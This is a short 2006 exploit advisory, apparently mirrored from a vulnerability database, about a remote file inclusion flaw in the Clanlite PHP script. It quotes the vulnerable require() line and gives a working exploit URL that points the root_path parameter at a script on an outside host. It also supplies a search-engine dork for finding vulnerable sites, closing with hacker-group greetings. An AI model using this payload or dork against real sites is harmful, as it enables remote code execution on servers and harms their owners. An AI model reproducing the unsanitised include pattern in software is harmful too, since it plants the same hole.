Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14873
HistoryOct 31, 2006 - 12:00 a.m.

Clanlite Remote File Include

2006-10-3100:00:00
vulners.com
26

#################################

Clanlite

#################################
#Class: Remote|Local File Include Vulnerability

Remote: Yes

Local: No

Type: High

#site:http://www.clanlite.org
#Download :http://www.comscripts.com/scripts/php.clanlite.1520.html

Author: x_w0x

Contact: [email protected]

###################################
#Vuln Code
=================conf-php.php================
in line 3 and 5
require($root_path.'conf/session.php');

####################################

£xploit:

http://www.victim.com/[path]/conf-php.php?root_path=http://DarknesseScript.txt

#Dork : "inurl: Clanlite "

#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0k, and elite-team

#w£lc0m£ In x0|0x
#by x_w0x
############################################################


MSN Messenger: appels gratuits de PC à PC !
http://www.msn.fr/msger/default.asp